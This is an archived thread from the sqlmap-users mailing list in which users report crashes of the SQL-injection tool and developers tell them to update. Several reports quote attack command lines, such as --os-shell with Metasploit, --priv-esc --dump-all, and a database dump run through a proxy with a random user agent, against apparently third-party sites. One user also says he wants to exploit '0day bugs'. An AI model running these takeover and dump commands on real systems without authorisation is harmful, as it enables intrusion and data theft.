It is the 0.8 sqlmap version I have other problems with sqlmap,and i could need some assistance,i`ve read the whole google and watched all youtube "hack" videos with sqlmap But [1] ASP (default) [2] PHP [3] JSP this is the only option i get for --os-pwn --os-bof with --msf-path /to/msfconsole/framework nothing works,i`ve installed all ,ruby-openssl,gems ruby,python newest version,openssl,bind,php latest version,libssl,all dependencies,rubygems,mandb,subversion latest i don`t know what to do anymore,i`ve tryied in ./msfconsole to setup php/exec php/shell_php php/bind LHOST ,exec commands and nothing works. can i get some help please ?i found many 0day bugs and i can`t use them,i tryied on 20 different machines sqlmap and still the same problems. Thanks in advance 2010/5/31 Ustupid MFU <ustup...@gm...> > which web application language does the web server support? > [1] ASP (default) > [2] PHP > [3] JSP > > 1 > [23:34:10] [WARNING] unable to retrieve the web server document root > please provide the web server document root [C:/Inetpub/wwwroot/]: > C:/xampp/htdocs/modules/weblinks0/ > [23:34:13] [INFO] retrieved web server full paths: > '/modules/weblinks0/visit.php' > please provide any additional web server full path to try to upload the > agent [C:/Inetpub/wwwroot/]: > [23:34:16] [WARNING] unable to upload the uploader agent on > '/modules/weblinks0' > [23:34:16] [ERROR] unhandled exception in sqlmap/0.8, please copy the > command line and the following text and send by e-mail to > sqlma...@li.... The developer will fix it as soon as > possible: > sqlmap version: 0.8 > Python version: 2.6.5 > Operating system: linux2 > Traceback (most recent call last): > File "./sqlmap.py", line 77, in main > start() > File "/.rnd2/pa/sqlmap/lib/controller/controller.py", line 259, in start > action() > File "/.rnd2/pa/sqlmap/lib/controller/action.py", line 141, in action > conf.dbmsHandler.osShell() > File "/.rnd2/pa/sqlmap/plugins/generic/takeover.py", line 98, in osShell > self.initEnv(web=web) > File "/.rnd2/pa/sqlmap/lib/takeover/abstraction.py", line 155, in initEnv > self.webInit() > File "/.rnd2/pa/sqlmap/lib/takeover/web.py", line 189, in webInit > uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, > raise404=False) > File "/.rnd2/pa/sqlmap/lib/request/connect.py", line 126, in getPage > conn = urllib2.urlopen(req) > File "/usr/local/lib/python2.6/urllib2.py", line 126, in urlopen > return _opener.open(url, data, timeout) > File "/usr/local/lib/python2.6/urllib2.py", line 391, in open > response = self._open(req, data) > File "/usr/local/lib/python2.6/urllib2.py", line 409, in _open > '_open', req) > File "/usr/local/lib/python2.6/urllib2.py", line 369, in _call_chain > result = func(*args) > File "/usr/local/lib/python2.6/urllib2.py", line 1161, in http_open > return self.do_open(httplib.HTTPConnection, req) > File "/usr/local/lib/python2.6/urllib2.py", line 1107, in do_open > h = http_class(host, timeout=req.timeout) # will parse host:port > File "/usr/local/lib/python2.6/httplib.py", line 657, in __init__ > self._set_hostport(host, port) > File "/usr/local/lib/python2.6/httplib.py", line 682, in _set_hostport > raise InvalidURL("nonnumeric port: '%s'" % host[i+1:]) > InvalidURL: nonnumeric port: '' > > [*] shutting down at: 23:34:16 > > ./sqlmap.py -u 'http://somehost/modules/weblinks0/visit.php?lid=44' > --os-shell --msf-path /opt/metasploit3/msf3 > |
From: Miroslav Stampar <miros…@gm…> — 2010-05-31 21:06:03 |
Hi and sorry for not replying sooner. Please update to the latest development version (v0.9-dev) by executing: svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev There were gazillion of bug fixes from version you use (v0.8) Kind regards On Mon, May 31, 2010 at 10:02 PM, Ustupid MFU <ustup...@gm...> wrote: > > It is the 0.8 sqlmap version > I have other problems with sqlmap,and i could need some assistance,i`ve read the whole google and watched all youtube "hack" videos with sqlmap > But > [1] ASP (default) > [2] PHP > [3] JSP > this is the only option i get for --os-pwn --os-bof with --msf-path /to/msfconsole/framework > nothing works,i`ve installed all ,ruby-openssl,gems ruby,python newest version,openssl,bind,php latest version,libssl,all dependencies,rubygems,mandb,subversion latest i don`t know what to do anymore,i`ve tryied in ./msfconsole to setup php/exec php/shell_php php/bind LHOST ,exec commands and nothing works. > can i get some help please ?i found many 0day bugs and i can`t use them,i tryied on 20 different machines sqlmap and still the same problems. > Thanks in advance > > 2010/5/31 Ustupid MFU <ustup...@gm...> >> >> which web application language does the web server support? >> [1] ASP (default) >> [2] PHP >> [3] JSP >> > 1 >> [23:34:10] [WARNING] unable to retrieve the web server document root >> please provide the web server document root [C:/Inetpub/wwwroot/]: C:/xampp/htdocs/modules/weblinks0/ >> [23:34:13] [INFO] retrieved web server full paths: '/modules/weblinks0/visit.php' >> please provide any additional web server full path to try to upload the agent [C:/Inetpub/wwwroot/]: >> [23:34:16] [WARNING] unable to upload the uploader agent on '/modules/weblinks0' >> [23:34:16] [ERROR] unhandled exception in sqlmap/0.8, please copy the command line and the following text and send by e-mail to sqlma...@li.... The developer will fix it as soon as possible: >> sqlmap version: 0.8 >> Python version: 2.6.5 >> Operating system: linux2 >> Traceback (most recent call last): >> File "./sqlmap.py", line 77, in main >> start() >> File "/.rnd2/pa/sqlmap/lib/controller/controller.py", line 259, in start >> action() >> File "/.rnd2/pa/sqlmap/lib/controller/action.py", line 141, in action >> conf.dbmsHandler.osShell() >> File "/.rnd2/pa/sqlmap/plugins/generic/takeover.py", line 98, in osShell >> self.initEnv(web=web) >> File "/.rnd2/pa/sqlmap/lib/takeover/abstraction.py", line 155, in initEnv >> self.webInit() >> File "/.rnd2/pa/sqlmap/lib/takeover/web.py", line 189, in webInit >> uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False) >> File "/.rnd2/pa/sqlmap/lib/request/connect.py", line 126, in getPage >> conn = urllib2.urlopen(req) >> File "/usr/local/lib/python2.6/urllib2.py", line 126, in urlopen >> return _opener.open(url, data, timeout) >> File "/usr/local/lib/python2.6/urllib2.py", line 391, in open >> response = self._open(req, data) >> File "/usr/local/lib/python2.6/urllib2.py", line 409, in _open >> '_open', req) >> File "/usr/local/lib/python2.6/urllib2.py", line 369, in _call_chain >> result = func(*args) >> File "/usr/local/lib/python2.6/urllib2.py", line 1161, in http_open >> return self.do_open(httplib.HTTPConnection, req) >> File "/usr/local/lib/python2.6/urllib2.py", line 1107, in do_open >> h = http_class(host, timeout=req.timeout) # will parse host:port >> File "/usr/local/lib/python2.6/httplib.py", line 657, in __init__ >> self._set_hostport(host, port) >> File "/usr/local/lib/python2.6/httplib.py", line 682, in _set_hostport >> raise InvalidURL("nonnumeric port: '%s'" % host[i+1:]) >> InvalidURL: nonnumeric port: '' >> [*] shutting down at: 23:34:16 >> ./sqlmap.py -u 'http://somehost/modules/weblinks0/visit.php?lid=44' --os-shell --msf-path /opt/metasploit3/msf3 > > ------------------------------------------------------------------------------ > > > _______________________________________________ > sqlmap-users mailing list > sqlma...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
From: Andreas Constantinides (MegaHz) <me…@me…> — 2010-06-04 09:14:45 |
hi there, i'd like to show you some errors i have received today scanning a site: [11:40:26] [INFO] testing connection to the target url [11:40:27] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sqlma...@li.... The developer will fix it as soon as possible: sqlmap version: 0.9-dev Python version: 2.6.4 Operating system: posix Traceback (most recent call last): File "./sqlmap.py", line 89, in main start() File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/controller.py", line 154, in start if not checkConnection() or not checkString() or not checkRegexp(): File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/checks.py", line 395, in checkConnection page, _ = Request.getPage() File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/connect.py", line 256, in getPage parseResponse(page, responseHeaders) File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/basic.py", line 73, in parseResponse htmlParser(page) File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/parse/html.py", line 69, in htmlParser page = sanitizeStr(page) File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/core/common.py", line 520, in sanitizeStr cleanString = unicode(inpStr) UnicodeDecodeError: 'ascii' codec can't decode byte 0xef in position 0: ordinal not in range(128) [*] shutting down at: 11:40:27 i am using the latest dev version on a mac. thanks -- Andreas |
From: Miroslav Stampar <miros…@gm…> — 2010-06-04 17:06:58 |
Hi. Thank you for your report Andreas. We've fixed the issue in our last commit. Please, update to the latest development version to have it fixed on your side. KR On Fri, Jun 4, 2010 at 10:41 AM, Andreas Constantinides (MegaHz) <me...@me...> wrote: > > hi there, > > i'd like to show you some errors i have received today scanning a site: > > > [11:40:26] [INFO] testing connection to the target url > > [11:40:27] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sqlma...@li.... The developer will fix it as soon as possible: > sqlmap version: 0.9-dev > Python version: 2.6.4 > Operating system: posix > Traceback (most recent call last): > File "./sqlmap.py", line 89, in main > start() > File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/controller.py", line 154, in start > if not checkConnection() or not checkString() or not checkRegexp(): > File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/checks.py", line 395, in checkConnection > page, _ = Request.getPage() > File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/connect.py", line 256, in getPage > parseResponse(page, responseHeaders) > File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/basic.py", line 73, in parseResponse > htmlParser(page) > File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/parse/html.py", line 69, in htmlParser > page = sanitizeStr(page) > File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/core/common.py", line 520, in sanitizeStr > cleanString = unicode(inpStr) > UnicodeDecodeError: 'ascii' codec can't decode byte 0xef in position 0: ordinal not in range(128) > > [*] shutting down at: 11:40:27 > > > i am using the latest dev version on a mac. > > thanks > > -- Andreas > > ------------------------------------------------------------------------------ > ThinkGeek and WIRED's GeekDad team up for the Ultimate > GeekDad Father's Day Giveaway. ONE MASSIVE PRIZE to the > lucky parental unit. See the prize list and enter to win: > http://p.sf.net/sfu/thinkgeek-promo > _______________________________________________ > sqlmap-users mailing list > sqlma...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
From: trog — <trogs…@gm…> — 2010-08-01 02:42:44 |
got the following error with --os-shell, what could be causing it? [23:37:22] [INPUT] please provide a list of directories absolute path comma separated that you want sqlmap to try to upload the agent [/var/www/test]: /home/herbs4/public_html/image/, /home/logs/, /home/herbs4/www/, /home/www/, /var/www/, /home/herbs4/access-logs/, /var/www/access-logs/, /home/ [23:37:59] [INFO] trying to upload the uploader agent [23:38:07] [WARNING] unable to upload the uploader agent on '/home/' [23:38:15] [WARNING] unable to upload the uploader agent on '/home/herbs4/access-logs/' [23:38:18] [ERROR] unhandled exception in sqlmap/0.6.4, please copy the command line and the following text and send by e-mail to sqlma...@li.... The developers will fix it as soon as possible: sqlmap version: 0.6.4 Python version: 2.6.5 Operating system: linux2 Traceback (most recent call last): File "/usr/bin/sqlmap", line 81, in main start() File "/usr/share/sqlmap/lib/controller/controller.py", line 255, in start action() File "/usr/share/sqlmap/lib/controller/action.py", line 137, in action conf.dbmsHandler.osShell() File "/usr/share/sqlmap/plugins/dbms/mysql.py", line 448, in osShell page, _ = Request.getPage(url=uploaderUrl, direct=True) File "/usr/share/sqlmap/lib/request/connect.py", line 128, in getPage conn = urllib2.urlopen(req) File "/usr/lib/python2.6/urllib2.py", line 126, in urlopen return _opener.open(url, data, timeout) File "/usr/lib/python2.6/urllib2.py", line 391, in open response = self._open(req, data) File "/usr/lib/python2.6/urllib2.py", line 409, in _open '_open', req) File "/usr/lib/python2.6/urllib2.py", line 369, in _call_chain result = func(*args) File "/usr/lib/python2.6/urllib2.py", line 1161, in http_open return self.do_open(httplib.HTTPConnection, req) File "/usr/lib/python2.6/urllib2.py", line 1107, in do_open h = http_class(host, timeout=req.timeout) # will parse host:port File "/usr/lib/python2.6/httplib.py", line 657, in __init__ self._set_hostport(host, port) File "/usr/lib/python2.6/httplib.py", line 682, in _set_hostport raise InvalidURL("nonnumeric port: '%s'" % host[i+1:]) InvalidURL: nonnumeric port: '80image' |
From: Bernardo Damele A. G. <berna…@gm…> — 2010-08-04 08:48:34 |
Use the latest development version from subversion repository. This issue is fixed there and in stable 0.8 version. Bernardo On Sun, Aug 1, 2010 at 03:42, trog - <trogs...@gm...> wrote: > got the following error with --os-shell, what could be causing it? > > [23:37:22] [INPUT] please provide a list of directories absolute path > comma separated that you want sqlmap to try to upload the agent > [/var/www/test]: /home/herbs4/public_html/image/, /home/logs/, > /home/herbs4/www/, /home/www/, /var/www/, /home/herbs4/access-logs/, > /var/www/access-logs/, /home/ > [23:37:59] [INFO] trying to upload the uploader agent > [23:38:07] [WARNING] unable to upload the uploader agent on '/home/' > [23:38:15] [WARNING] unable to upload the uploader agent on > '/home/herbs4/access-logs/' > [23:38:18] [ERROR] unhandled exception in sqlmap/0.6.4, please copy > the command line and the following text and send by e-mail to > sqlma...@li.... The developers will fix it as soon > as possible: > sqlmap version: 0.6.4 > Python version: 2.6.5 > Operating system: linux2 > Traceback (most recent call last): > File "/usr/bin/sqlmap", line 81, in main > start() > File "/usr/share/sqlmap/lib/controller/controller.py", line 255, in start > action() > File "/usr/share/sqlmap/lib/controller/action.py", line 137, in action > conf.dbmsHandler.osShell() > File "/usr/share/sqlmap/plugins/dbms/mysql.py", line 448, in osShell > page, _ = Request.getPage(url=uploaderUrl, direct=True) > File "/usr/share/sqlmap/lib/request/connect.py", line 128, in getPage > conn = urllib2.urlopen(req) > File "/usr/lib/python2.6/urllib2.py", line 126, in urlopen > return _opener.open(url, data, timeout) > File "/usr/lib/python2.6/urllib2.py", line 391, in open > response = self._open(req, data) > File "/usr/lib/python2.6/urllib2.py", line 409, in _open > '_open', req) > File "/usr/lib/python2.6/urllib2.py", line 369, in _call_chain > result = func(*args) > File "/usr/lib/python2.6/urllib2.py", line 1161, in http_open > return self.do_open(httplib.HTTPConnection, req) > File "/usr/lib/python2.6/urllib2.py", line 1107, in do_open > h = http_class(host, timeout=req.timeout) # will parse host:port > File "/usr/lib/python2.6/httplib.py", line 657, in __init__ > self._set_hostport(host, port) > File "/usr/lib/python2.6/httplib.py", line 682, in _set_hostport > raise InvalidURL("nonnumeric port: '%s'" % host[i+1:]) > InvalidURL: nonnumeric port: '80image' > > ------------------------------------------------------------------------------ > The Palm PDK Hot Apps Program offers developers who use the > Plug-In Development Kit to bring their C/C++ apps to Palm for a share > of $1 Million in cash or HP Products. Visit us here for more details: > http://p.sf.net/sfu/dev2dev-palm > _______________________________________________ > sqlmap-users mailing list > sqlma...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Faisal Hourani <faisa…@gm…> — 2010-09-12 21:22:39 |
sqlmap version: 0.8 Python version: 2.6.5 Operating system: linux2 Traceback (most recent call last): File "sqlmap.py", line 77, in main start() File "/home/0x00/sqlmap/lib/controller/controller.py", line 259, in start action() File "/home/0x00/sqlmap/lib/controller/action.py", line 144, in action conf.dbmsHandler.osPwn() File "/home/0x00/sqlmap/plugins/generic/takeover.py", line 169, in osPwn self.initEnv(web=web) File "/home/0x00/sqlmap/lib/takeover/abstraction.py", line 155, in initEnv self.webInit() File "/home/0x00/sqlmap/lib/takeover/web.py", line 189, in webInit uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False) File "/home/0x00/sqlmap/lib/request/connect.py", line 126, in getPage conn = urllib2.urlopen(req) File "/usr/local/lib/python2.6/urllib2.py", line 126, in urlopen return _opener.open(url, data, timeout) File "/usr/local/lib/python2.6/urllib2.py", line 391, in open response = self._open(req, data) File "/usr/local/lib/python2.6/urllib2.py", line 409, in _open '_open', req) File "/usr/local/lib/python2.6/urllib2.py", line 369, in _call_chain result = func(*args) File "/usr/local/lib/python2.6/urllib2.py", line 1161, in http_open return self.do_open(httplib.HTTPConnection, req) File "/usr/local/lib/python2.6/urllib2.py", line 1107, in do_open h = http_class(host, timeout=req.timeout) # will parse host:port File "/usr/local/lib/python2.6/httplib.py", line 657, in __init__ self._set_hostport(host, port) File "/usr/local/lib/python2.6/httplib.py", line 682, in _set_hostport raise InvalidURL("nonnumeric port: '%s'" % host[i+1:]) InvalidURL: nonnumeric port: '' |
From: Miroslav Stampar <miros…@gm…> — 2010-09-13 07:53:31 |
This was fixed in our development version. Please check it out from our SVN repository to have it fixed (svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev). KR On Sun, Sep 12, 2010 at 11:22 PM, Faisal Hourani <faisa...@gm...> wrote: > sqlmap version: 0.8 > Python version: 2.6.5 > Operating system: linux2 > Traceback (most recent call last): > File "sqlmap.py", line 77, in main > start() > File "/home/0x00/sqlmap/lib/controller/controller.py", line 259, in start > action() > File "/home/0x00/sqlmap/lib/controller/action.py", line 144, in action > conf.dbmsHandler.osPwn() > File "/home/0x00/sqlmap/plugins/generic/takeover.py", line 169, in osPwn > self.initEnv(web=web) > File "/home/0x00/sqlmap/lib/takeover/abstraction.py", line 155, in initEnv > self.webInit() > File "/home/0x00/sqlmap/lib/takeover/web.py", line 189, in webInit > uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, > raise404=False) > File "/home/0x00/sqlmap/lib/request/connect.py", line 126, in getPage > conn = urllib2.urlopen(req) > File "/usr/local/lib/python2.6/urllib2.py", line 126, in urlopen > return _opener.open(url, data, timeout) > File "/usr/local/lib/python2.6/urllib2.py", line 391, in open > response = self._open(req, data) > File "/usr/local/lib/python2.6/urllib2.py", line 409, in _open > '_open', req) > File "/usr/local/lib/python2.6/urllib2.py", line 369, in _call_chain > result = func(*args) > File "/usr/local/lib/python2.6/urllib2.py", line 1161, in http_open > return self.do_open(httplib.HTTPConnection, req) > File "/usr/local/lib/python2.6/urllib2.py", line 1107, in do_open > h = http_class(host, timeout=req.timeout) # will parse host:port > File "/usr/local/lib/python2.6/httplib.py", line 657, in __init__ > self._set_hostport(host, port) > File "/usr/local/lib/python2.6/httplib.py", line 682, in _set_hostport > raise InvalidURL("nonnumeric port: '%s'" % host[i+1:]) > InvalidURL: nonnumeric port: '' > > > ------------------------------------------------------------------------------ > Start uncovering the many advantages of virtual appliances > and start using them to simplify application deployment and > accelerate your shift to cloud computing > http://p.sf.net/sfu/novell-sfdev2dev > > _______________________________________________ > sqlmap-users mailing list > sqlma...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
From: Cheng Roger <hm…@gm…> — 2010-12-29 05:59:33 |
sqlmap version: 0.8 Python version: 2.6.2 Operating system: win32 Traceback (most recent call last): File "sqlmap.py", line 74, in main File "libcoreoption.pyc", line 1141, in init File "libparsequeriesfile.pyc", line 229, in queriesParser File "xmlsax__init__.pyc", line 33, in parse File "xmlsaxexpatreader.pyc", line 107, in parse File "xmlsaxxmlreader.pyc", line 119, in parse File "xmlsaxexpatreader.pyc", line 111, in prepareParser UnicodeEncodeError: 'ascii' codec can't encode characters in position 30-31: ord inal not in range(128) |
From: Miroslav Stampar <miros…@gm…> — 2010-12-29 08:19:49 |
hi. this was probably fixed long time ago. update to the latest version from our SVN repository to have it fixed (svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev). kr p.s. if you are trying to change content of the queries.xml with the non-ASCII conformant characters then please try with the latest version and please report. On Wed, Dec 29, 2010 at 6:59 AM, Cheng Roger <hm...@gm...> wrote: > > sqlmap version: 0.8 > Python version: 2.6.2 > Operating system: win32 > Traceback (most recent call last): > File "sqlmap.py", line 74, in main > File "libcoreoption.pyc", line 1141, in init > File "libparsequeriesfile.pyc", line 229, in queriesParser > File "xmlsax__init__.pyc", line 33, in parse > File "xmlsaxexpatreader.pyc", line 107, in parse > File "xmlsaxxmlreader.pyc", line 119, in parse > File "xmlsaxexpatreader.pyc", line 111, in prepareParser > UnicodeEncodeError: 'ascii' codec can't encode characters in position > 30-31: ord > inal not in range(128) > > > ------------------------------------------------------------------------------ > Learn how Oracle Real Application Clusters (RAC) One Node allows customers > to consolidate database storage, standardize their database environment, > and, > should the need arise, upgrade to a full multi-node Oracle RAC database > without downtime or disruption > http://p.sf.net/sfu/oracle-sfdevnl > _______________________________________________ > sqlmap-users mailing list > sqlma...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Chris Clements <cclem…@fl…> — 2011-07-07 20:45:10 |
[15:37:17] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4224), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sqlma...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev (r4224) Python version: 2.6.5 Operating system: posix Command line: ./sqlmap.py --batch --eta --os-shell --priv-esc --dump-all --forms -o -u ********************************************** Technique: None Back-end DBMS: Microsoft Access (fingerprinted) Traceback (most recent call last): File "./sqlmap.py", line 86, in main start() File "/pentest/database/sqlmap/lib/controller/controller.py", line 552, in start action() File "/pentest/database/sqlmap/lib/controller/action.py", line 112, in action conf.dbmsHandler.dumpAll() File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 1781, in dumpAll self.getTables() File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 806, in getTables tables = self.getTables(False) File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 867, in getTables query = rootQuery.inband.query AttributeError: 'DictObject' object has no attribute 'inband' [*] shutting down at 15:37:17 Chris |
From: Bernardo Damele A. G. <berna…@gm…> — 2011-07-08 09:14:28 |
Hi Chris, This is fixed now, but there's another bug I introduced recently. I will fix that as soon as possible. Thanks for reporting. Bernardo On 7 July 2011 21:44, Chris Clements <cclem...@fl...> wrote: > [15:37:17] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4224), retry > your run with the latest development version from the Subversion > repository. If the exception persists, please send by e-mail to > sqlma...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the > bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4224) > Python version: 2.6.5 > Operating system: posix > Command line: ./sqlmap.py --batch --eta --os-shell --priv-esc --dump-all > --forms -o -u ********************************************** > Technique: None > Back-end DBMS: Microsoft Access (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 86, in main > start() > File "/pentest/database/sqlmap/lib/controller/controller.py", line 552, > in start > action() > File "/pentest/database/sqlmap/lib/controller/action.py", line 112, in > action > conf.dbmsHandler.dumpAll() > File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line > 1781, in dumpAll > self.getTables() > File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line > 806, in getTables > tables = self.getTables(False) > File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line > 867, in getTables > query = rootQuery.inband.query > AttributeError: 'DictObject' object has no attribute 'inband' > > [*] shutting down at 15:37:17 > > > Chris > > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sqlma...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
From: zerkerpure pkinghotmailcom <zerke…@ho…> — 2011-09-18 16:34:13 |
hello I recently installed Sqlmap and python like I was suppost to but when i go to click sqlmap which is a python file it starts up and says the normal sqlmap/0.9 - autmatic SQL injection and database takeover tool http://sqlmap.sourceforge.net Usage: python C:UsersNameDesktopsqlmapsqlmap.py [options] then the problem occurs below is exactly what it says: "sqlmap.py:error: missing a mandatory parameter ('-d' , '-u', '-l', '-r', '-g', '-c', '--wizard' or '--update'), -h for help. But when i try typing anything and entering like -h it just automatically closes out and does nothing can you please help me out with this problem because im not sure what im doing wrong or what i need to do to fix. |
From: Miroslav Stampar <miros…@gm…> — 2011-09-18 16:38:28 |
hi. you are probably using Windows and you just double clicked the sqlmap.py file :) you are supposed to go the "Command Prompt" inside Windows OS, go to the sqlmap's directory, and from there run: python sqlmap.py together with other options. also, you are advised to checkout the latest v1.0-dev version from our repository. you can do that by downloading TortoiseSVN and right-click inside the place where you want it to be checked out, and select "Checkout...". as an URL address enter: https://svn.sqlmap.org/sqlmap/trunk/sqlmap kind regards. On Sun, Sep 18, 2011 at 6:34 PM, zerkerpure pkinghotmailcom <zerke...@ho...> wrote: > hello I recently installed Sqlmap and python like I was suppost to but when > i go to click sqlmap which is a python file it starts up and says the > normal > sqlmap/0.9 - autmatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > Usage: python C:UsersNameDesktopsqlmapsqlmap.py [options] > then the problem occurs below is exactly what it says: > "sqlmap.py:error: missing a mandatory parameter ('-d' , '-u', '-l', '-r', > '-g', '-c', '--wizard' or '--update'), -h for help. But when i try typing > anything and entering like -h it just automatically closes out and does > nothing can you please help me out with this problem because im not sure > what im doing wrong or what i need to do to fix. > > ------------------------------------------------------------------------------ > BlackBerry® DevCon Americas, Oct. 18-20, San Francisco, CA > http://p.sf.net/sfu/rim-devcon-copy2 > _______________________________________________ > sqlmap-users mailing list > sqlma...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Dusan Lauko <dusan…@gm…> — 2012-07-22 19:52:24 |
[20:02:09] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run with the latest development version from the Subversion repository. If the exception per sists, please send by e-mail to sqlma...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 0.9 (r3630) Python version: 2.7.2 Operating system: nt Command line: D:Anon HackingBlack HatSQLiSQLmapSQLmapsqlmap.py --proxy=htt p://186.215.202.163:8080 -u **************************************************** ***************** --random-agent --dump-all --exclude-sysdb --eta Technique: ERROR Back-end DBMS: MySQL (fingerprinted) Traceback (most recent call last): File "D:Anon HackingBlack HatSQLiSQLmapSQLmapsqlmap.py", line 82, in mai n start() File "D:Anon HackingBlack HatSQLiSQLmapSQLmaplibcontrollercontroller.p y", line 447, in start action() File "D:Anon HackingBlack HatSQLiSQLmapSQLmaplibcontrolleraction.py", line 106, in action conf.dbmsHandler.dumpAll() File "D:Anon HackingBlack HatSQLiSQLmapSQLmappluginsgenericenumeration .py", line 1496, in dumpAll data = self.dumpTable() File "D:Anon HackingBlack HatSQLiSQLmapSQLmappluginsgenericenumeration .py", line 1275, in dumpTable colString = ", ".join(column for column in colList) TypeError: sequence item 1: expected string or Unicode, NoneType found [*] shutting down at: 20:02:09 |
From: Bernardo Damele A. G. <berna…@gm…> — 2012-07-22 19:58:19 |
Dusan, you are running a year and a half outdated version of sqlmap. Run the following command: $ git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev and try your run again from sqlmap-dev directory. Bernardo On 22 July 2012 20:52, Dusan Lauko <dusan...@gm...> wrote: > [20:02:09] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run > with the > latest development version from the Subversion repository. If the > exception per > sists, please send by e-mail to sqlma...@li... the > following > text and any information required to reproduce the bug. The developers > will try > to reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 0.9 (r3630) > Python version: 2.7.2 > Operating system: nt > Command line: D:Anon HackingBlack HatSQLiSQLmapSQLmapsqlmap.py > --proxy=htt > p://186.215.202.163:8080 -u > **************************************************** > ***************** --random-agent --dump-all --exclude-sysdb --eta > Technique: ERROR > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "D:Anon HackingBlack HatSQLiSQLmapSQLmapsqlmap.py", line > 82, in mai > n > start() > File "D:Anon HackingBlack > HatSQLiSQLmapSQLmaplibcontrollercontroller.p > y", line 447, in start > action() > File "D:Anon HackingBlack > HatSQLiSQLmapSQLmaplibcontrolleraction.py", > line 106, in action > conf.dbmsHandler.dumpAll() > File "D:Anon HackingBlack > HatSQLiSQLmapSQLmappluginsgenericenumeration > .py", line 1496, in dumpAll > data = self.dumpTable() > File "D:Anon HackingBlack > HatSQLiSQLmapSQLmappluginsgenericenumeration > .py", line 1275, in dumpTable > colString = ", ".join(column for column in colList) > TypeError: sequence item 1: expected string or Unicode, NoneType found > > [*] shutting down at: 20:02:09 > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sqlma...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
From: D Atkin <je…@ho…> — 2012-08-03 16:37:25 |
hi im try to run sqlmap from msf but i keep getting this error the sqlmap script could not be found: iv already had sqlmap path to system Path envirounment put im still getting this error. can u tell me what i can do from here. Thank you! |
From: Miroslav Stampar <miros…@gm…> — 2012-08-06 22:01:40 |
